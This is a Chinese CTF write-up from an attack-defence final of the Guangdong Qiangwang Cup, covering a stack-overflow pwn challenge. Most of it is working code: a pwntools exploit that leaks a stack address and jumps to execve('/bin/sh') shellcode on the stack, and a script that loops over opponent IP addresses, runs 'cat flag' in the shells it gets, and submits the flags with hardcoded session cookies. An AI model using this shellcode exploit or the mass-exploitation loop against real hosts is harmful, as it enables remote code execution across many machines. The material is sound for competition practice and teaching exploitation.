第三届 广东省强网杯 线下决赛 pwn-AWD模式

第三届广东省强网杯的线下决赛,只有一道pwn题,而且是啥保护都没开的栈溢出,有pwn手的队伍都能秒patch,然后就是写好exp,十五分钟刷新一轮flag的时候跑一次打全场,全程咸鱼快睡着了都。。

题目分析

栈溢出,溢出8字节刚好能覆盖返回地址。程序中有给出栈地址,而且没开NX保护,所以我这里选择写shellcode到栈上然后覆盖返回地址为shellcode就行了。

leak stack

stack overflow

完整EXP

exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *

#elf = ELF('./pwn')
#libc = elf.libc #/lib/x86_64-linux-gnu/libc-2.23.so

context(arch = 'amd64', os = 'linux')

def exp(IP, PORT):
p = remote(IP, PORT)
#p = process('./pwn')
p.sendlineafter('Enter your choice:\n', '3')
payload1 = 'a'*0x28 + p64(0x12345678) + 'qqqq' + p64(0x400809)
p.sendafter('What?', payload1)
p.sendlineafter('Enter your choice:\n', '2')
p.recvuntil('It is magic: [0x')
stack = int(p.recvn(12), 16)
#log.success(hex(stack))
shellcode_addr = stack
shellcode = ""
#shellcode += asm('push 0')
shellcode += asm('mov dword ptr [rsp], 0x6e69622f')
shellcode += asm('mov dword ptr [rsp+4], 0x0068732f')

shellcode += asm('mov rdi, rsp')
shellcode += asm('xor rsi, rsi')
shellcode += asm('xor rdx, rdx')
shellcode += asm('xor rax, rax')
shellcode += asm('mov rax, 59')
shellcode += asm('syscall')
payload2 = shellcode.ljust(0x38, '\0') + p64(shellcode_addr)
#gdb.attach(p, 'b *0x400881\nb *0x400896')
p.sendlineafter('Enter your choice:\n', '3')
p.sendafter('What?', payload2)
#print hex(len(shellcode))
p.sendlineafter('Enter your choice:\n', 'a')
return p

if __name__ == '__main__':
p = exp('127.0.0.1', 9527)
p.interactive()


# 2f 62 69 6e 2f 73 68/bin/sh
#//bin/sh

打全场的exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
from pwn import *
import time
import os
import requests
from exploit import *

def submit_flag(flag, token):
url = "http://100.100.100.10/checkAnswer"
failed = '\u56de\u7b54\u9519\u8bef'
resub = '\u91cd\u590d\u4f5c\u7b54'
#failed = 'QAQ'
data = {
"answer":flag,
"token":token,
"rule":2,
"theme_id":1,
"type":2
}
cookie = {
"XSRF-TOKEN":"eyJpdiI6Ik5wUFkrbHI3NUJIRlFtK0RKaWhBblE9PSIsInZhbHVlIjoiMHR4WVJ4dk1hSUxxbkp0MFY2b2FZWFhtTkkzTEx5MDFSY3M0SE9FNjJSeTB1NzF2ZTFDNjBOSFdXNlRvempzWSIsIm1hYyI6Ijg2YjMzMTMxYWE2NDYxYTAzM2JmZjY0ZWY3MzA1ZDIxMGM1MGEzYTJhNmQ5M2RjNjVmMTc2YTYxNzEyNTcyNTIifQ%3D%3D",
"laravel_session":"eyJpdiI6InMwWFEyaVk3a29PVlRla0JiQUpBN1E9PSIsInZhbHVlIjoiXC9PaG85MGFnSzUxRkdSdUh2cHdSYVljekJ4U1NkcGNBS25kQUNkcXJuWUhKREVicGV0VzBaRHlVSVk3YmRZXC9ZIiwibWFjIjoiZjNkNjQyYjRhM2MyYzg2NDY5ZWMxYjE5MzRjZDVhNTNlOTk5OWRjYzU5OWY4M2FhNDI4NTMzM2NkNTI1ZjI2MyJ9"

}
#print "[O.O] Submiting flag"
response = requests.post(url,data=data ,cookies = cookie ,timeout=4)
content = response.content
#print "[+] Content : %s" % (content)
if failed in content:
print "[T.T] Submit failed!"
return False
elif resub in response.content:
print "[ :)] Submit Chong Fu!"
return False
else:
print "[^.^] Submit success!"
return True


def get_shell(ip='', port=0):
#exploit code
p = exp(ip, port)
return p

def attack(sleep_time=10):
with open('./flag_list.txt', 'a+') as fd:
# 打全场 AWD用
#ip_list = ['172.16.20.4', '172.16.20.5','172.16.20.7', '172.16.20.9', '172.16.20.11']
# while True:
for IP1 in range(2,22):
try:
p = get_shell(ip='172.16.%d.30'%IP1, port=10000)
#p = get_shell(ip='127.0.0.1', port=PORT)
p.sendline('cat flag')
p.recvuntil('flag{', drop=True)
flag = p.recvuntil('}', drop=True)
print '[^.^] flag' + flag
fd.write('flag{'+flag+'}\n')
submit_flag(flag, token)
p.close()
except:
print '[T.T] FUCK'
print "-"*0x50+'\n'
time.sleep(sleep_time)

def main():
attack(sleep_time=1)

if __name__ == '__main__':
main()

效果如下

0%